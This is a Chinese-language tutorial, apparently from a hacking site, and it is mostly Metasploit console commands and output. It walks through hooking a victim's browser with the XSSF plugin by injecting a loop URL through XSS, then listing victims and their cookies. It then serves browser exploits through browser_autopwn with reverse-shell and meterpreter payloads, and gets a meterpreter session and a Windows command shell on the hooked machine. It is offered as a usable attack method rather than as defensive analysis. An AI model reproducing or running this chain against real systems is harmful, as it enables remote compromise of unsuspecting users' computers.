author:RootkitHat.Org
有裝B的嫌疑,但是你如何得知你的目標用什麼系統和什麼瀏覽器
相似的工具這裏有一個:http://xss-proxy.sourceforge.net
附件: Parh /sploits/2011/06/XSSF.zip
解壓後吧附件全部複製到 /msf3/裏面
啓動metasploit ,創建數據庫,並且載入插件
o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 635 exploits - 335 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r11089 updated 239 days ago (2010.11.22)
Warning: This copy of the Metasploit Framework was last updated 239 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
msf > db_disconnect
msf > db_driver mysql
msf > db_connect root:[email protected]/xssftest
msf > load xssf
__ __ ______ ______ ______
/\_\_\_\ /\ ___\ /\ ___\ /\ ___\
\/_/\_\/_ \ \___ \ \ \___ \ \ \ __\
/\_\/\_\ \/\_____\ \/\_____\ \ \_\
\/_/\/_/ \/_____/ \/_____/ \/_/ Cross-Site Scripting Framework
Ludovic Courgnaud - CONIX Security
[+] Server started : http://192.168.56.101:8888/
[*] Please, inject 'http://192.168.56.101:8888/loop' resource in an XSS
[*] Successfully loaded plugin: XSSF如果IP不是你外網IP請修改/opt/metasploit3/msf3/plugins/xssf.rb 吧0,0,0,0換成你的外網IP
然後讓目標機xss “http://192.168.56.101:8888/loop”
查看xss會話
msf > xssf_victims
Victims
=======
id xssf_server_id active ip interval browser_name browser_version cookie
-- -------------- ------ -- -------- ------------ --------------- ------
1 1 true 192.168.56.1 2 Internet Explorer 6.0 YES
[*] Use xssf_information [VictimID] to see more information about a victimtrue 代表可以使用
鏈接xss會話
msf > xssf_information 1
INFORMATION ABOUT VICTIM 1
============================
IP ADDRESS : 192.168.56.1
ACTIVE : TRUE
FIRST REQUEST : Tue Jul 19 23:30:25 UTC 2011
LAST REQUEST : Tue Jul 19 23:31:17 UTC 2011
CONNECTION TIME : 52.0 seconds
BROWSER NAME : Internet Explorer
BROWSER VERSION : 6.0
OS NAME : Windows
OS VERSION : XP
ARCHITECTURE : ARCH_X86
LOCATION : file:///C:/Documents and Settings/dis9team/妗棰/xss.htm
COOKIES ? : YES
RUNNING ATTACK : NONE如何取得系統權限:
使用METASPLOIT模塊自動創建一些瀏覽器漏洞 注意端口不能和xssf插件端口相同
msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The IP address to use for reverse-connect payloads
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
msf auxiliary(browser_autopwn) > set LHOST 192.168.56.101
LHOST => 192.168.56.101
msf auxiliary(browser_autopwn) > set SRVHOST 192.168.56.101
SRVHOST => 192.168.56.101
msf auxiliary(browser_autopwn) > set SRVPORT 8081
SRVPORT => 8081
msf auxiliary(browser_autopwn) > exploit
msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed
[*] Starting exploit modules on host 192.168.56.101...
[*] ---
[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/QlQp2UFx8EADO
[*] Server started.
msf auxiliary(browser_autopwn) > [*] Starting exploit multi/browser/java_calendar_deserialize with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/pqDNRyLmHuA
[*] Server started.
[*] Starting exploit multi/browser/java_trusted_chain with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/kXVd9wNJ7
[*] Server started.
[*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/zNNqGn8p
[*] Server started.
[*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/nZqqJnbK17P2Uu
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/l45IFo
[*] Server started.
[*] Starting exploit multi/browser/opera_historysearch with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/4uYjQ9Cd
[*] Server started.
[*] Starting exploit osx/browser/safari_metadata_archive with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/jUnB2WdlVh
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_marshaled_punk with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/w3xxrTDcW1D
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_rtsp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/nf21OPGpG4
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_smil_debug with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/C7HBuD
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/GpI7DbKJ2wp5kS
[*] Server started.
[*] Starting exploit windows/browser/java_basicservice_impl with payload windows/meterpreter/reverse_tcp
[-] Exploit failed: windows/meterpreter/reverse_tcp is not a compatible payload.
[-] Failed to start exploit module windows/browser/java_basicservice_impl
[*] Starting exploit windows/browser/ms03_020_ie_objecttype with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/xFm6pSwb
[*] Server started.
[*] Starting exploit windows/browser/ms10_018_ie_behaviors with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/yVJcsYOtv
[*] Server started.
[*] Starting exploit windows/browser/ms10_xxx_ie_css_clip with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/JaT9yvjsEik
[*] Server started.
[*] Starting exploit windows/browser/winzip_fileview with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/1t4f8o9
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on 192.168.56.101:3333
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse handler on 192.168.56.101:6666
[*] Starting the payload handler...
[*] Starting the payload handler...
[*] Started reverse handler on 192.168.56.101:7777
[*] Starting the payload handler...
[*] --- Done, found 16 exploit modules
[*] Using URL: http://192.168.56.101:8081/Xy5LvGuPst
[*] Server started.查看可以利用的漏洞
msf auxiliary(browser_autopwn) > jobs
Jobs
====
Id Name
-- ----
0 Auxiliary: server/browser_autopwn
1 Exploit: multi/browser/firefox_escape_retval
2 Exploit: multi/browser/java_calendar_deserialize
3 Exploit: multi/browser/java_trusted_chain
4 Exploit: multi/browser/mozilla_compareto
5 Exploit: multi/browser/mozilla_navigatorjava
6 Exploit: multi/browser/opera_configoverwrite
7 Exploit: multi/browser/opera_historysearch
8 Exploit: osx/browser/safari_metadata_archive
9 Exploit: windows/browser/apple_quicktime_marshaled_punk
10 Exploit: windows/browser/apple_quicktime_rtsp
11 Exploit: windows/browser/apple_quicktime_smil_debug
12 Exploit: windows/browser/ie_createobject
13 Exploit: windows/browser/ms03_020_ie_objecttype
14 Exploit: windows/browser/ms10_018_ie_behaviors
15 Exploit: windows/browser/ms10_xxx_ie_css_clip
16 Exploit: windows/browser/winzip_fileview
17 Exploit: multi/handler
18 Exploit: multi/handler
19 Exploit: multi/handler根據你目標的操作系統選擇利用模塊
xssf_exploit 1 12 第一個數字是xss會話 第二個數字是瀏覽器漏洞編號
msf auxiliary(browser_autopwn) > xssf_exploit 1 12
[*] Searching Metasploit launched module with JobID = '12'...
[+] A running exploit exists : 'Exploit: windows/browser/ie_createobject'
[*] Exploit execution started, press [CTRL + C] to stop it !
[*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 192.168.56.101:44018...
[+] Code 'Exploit: windows/browser/ie_createobject' sent to victim '4'
[+] Remaining victims to attack : NONE
[*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 192.168.56.101:51709...
[*] Sending EXE payload to 192.168.56.101:60903...
[*] Sending stage (749056 bytes) to 192.168.56.1
[*] Meterpreter session 1 opened (192.168.56.101:3333 -> 192.168.56.1:37151) at Tue Jul 19 23:42:03 -0400 2011
[*] Session ID 1 (192.168.56.101:3333 -> 192.168.56.1:37151) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: njoFrATVcA.exe (1728)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 1092
[*] New server process: notepad.exe (1092)
^C[-] Exploit interrupted by the console user
msf auxiliary(browser_autopwn) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 DIS9TEAM-7A9CFB\dis9team @ DIS9TEAM-7A9CFB 192.168.56.101:3333 -> 192.168.56.1:37151
msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 5504 created.
Channel 1 created.
Microsoft Windows XP [版本 5.1.2600]
(C) 版權所有 1985-2001 Microsoft Corp.
C:\Documents and Settings\dis9team\桌面>完畢